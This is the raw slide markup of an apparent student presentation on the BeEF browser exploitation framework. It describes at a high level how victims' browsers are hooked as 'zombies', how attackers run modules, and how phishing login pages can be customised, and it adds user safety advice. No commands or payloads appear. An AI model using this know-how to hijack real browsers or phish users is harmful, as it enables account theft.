              <a:t> is an extraordinary and powerful tool for exploiting web browsers, and it's a terrifying example of why you should never click on suspicious links. Even if things look fine, you should be really careful with anything that pops up in your browser for permission to access your webcam or audio or that needs you to enter in account credentials. Beef hacking framework is a powerful tool that can be leveraged by systems security professionals to try and design systems especially web apps which are safe for use by the end user. A hacker with the necessary knowledge can also add his own modifications on beef hacking framework to make it more powerful. For example, A hacker can design the login page of any website he needs information from and even customize the URLs of the phishing page to make them look more believable in the eyes of the victim. We as users of the internet, we should avoid visiting malicious and insecure websites to avoid being victims of beef hacking. We should also check the authenticity of web pages which require us to provide them with personal details.</a:t>
            </a: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0F70846-5069-57D7-6216-F4C2F236AA8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3002199958"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3233272" y="2779058"/>
          <a:ext cx="6096000" cy="1849120"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5DA37D80-6434-44D0-A028-1B22A696006F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="890493">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="758043689"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2250142">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1512169161"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2955365">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="735098477"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="364365">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-IN" dirty="0" err="1"/>
                        <a:t>Sl.No</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-IN" dirty="0"/>
                        <a:t>Name</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-IN" dirty="0"/>
                        <a:t>USN</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4094386913"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-IN" dirty="0"/>
                        <a:t>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Narasimha </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-IN" dirty="0" err="1"/>
                        <a:t>Katti</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-IN" dirty="0"/>
                        <a:t>2GI19CS079</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2306550211"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-IN" dirty="0"/>
                        <a:t>02</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-IN" dirty="0"/>
                        <a:t>Niranjan </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-IN" dirty="0" err="1"/>
                        <a:t>Baloji</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-IN" dirty="0"/>
                        <a:t>2GI19CS083</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="795336894"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-IN" dirty="0"/>
                        <a:t>03</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-IN" dirty="0"/>
                        <a:t>Pavan </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-IN" dirty="0" err="1"/>
                        <a:t>Chikkodikar</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-IN" dirty="0"/>
                        <a:t>2GI19CS089</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="7413992"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-IN" dirty="0"/>
                        <a:t>04</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-IN" dirty="0"/>
                        <a:t>Rahul Joshi</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-IN" dirty="0"/>
                        <a:t>2GI19CS106</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="990354882"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0269966-1433-F70D-12FF-4C8B3AC25043}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3137648" y="4760738"/>
            <a:ext cx="6113928" cy="761042"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="13970" marR="3175" indent="-6350" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="960"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Under the Guidance of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Asst. Prof. Sagar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Pujar</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA6A8BF1-BCC9-7FEF-74BF-EA837E863AF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2608731" y="6050285"/>
            <a:ext cx="8417858" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Department of Computer Science and Engineering </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37EAD5CF-1D38-367E-8630-A86DD8A342E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2617690" y="1309363"/>
            <a:ext cx="7548281" cy="1266372"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" marR="3175" indent="-6350" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="775"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Karnataka Law Society’s </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1559560" marR="3175" indent="-6350" algn="l">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="785"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>GOGTE INSTITUTE OF TECHNOLOGY </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="929640" marR="1230630" indent="441960" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="155000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="190"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Udyambag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Belagavi -590008 Karnataka, India.</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325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  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Content Placeholder 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Installation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BeEF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Steps to perform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Hacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Conclusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1067593B-CEF1-CD0C-8A3B-8475DC7872C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134471" y="170329"/>
            <a:ext cx="11887200" cy="6535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id="{0F53ACD0-1B45-D940-F51F-F41EFC337096}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FB415D57-863F-4955-9A52-5E1004C612CB}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/9/2023 9:39 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0905A759-E5E2-7625-FE31-D87514B0EF42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FF54DE5-C571-48E8-A5BC-B369434E2F44}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>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10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07FD9EB5-E8E1-2DEF-CB9D-A0D2259C70A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134471" y="170329"/>
            <a:ext cx="11887200" cy="6535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60D4004-3511-1834-8B5C-7E597DB6E9F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104899" y="1463531"/>
            <a:ext cx="10047193" cy="1289071"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="8890" marR="3175" indent="-6350" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1040"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> is the Browser Exploitation Framework and is a Open-source penetration testing tool that focuses on browser-based vulnerabilities. That means that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>beEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> is extremely useful for Social engineers with "fake" website's. This tool is of course also useful for anyone who "need's" it.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C9245F5-713D-FB15-A3C7-48D65C3E9D9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104898" y="2846731"/>
            <a:ext cx="10047193" cy="2120068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:sp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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> is used to send commands that will be executed on the web browser of the victim computer. The victim users will be added as zombies to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> framework. When the attacker logs into to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> server, he can then execute the modules against the specified victim user. An attacker can execute any module or write his own module, which enables him to execute an arbitrary command against the victim zombie.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Date Placeholder 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67092159-0100-3AE0-3CA0-241BB37D4637}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5696E103-32D8-4B9F-996D-21DE695DF4A6}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1/9/2023 9:39 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Slide Number Placeholder 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56651BA9-BFC2-297F-F957-81A8DF4F3430}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
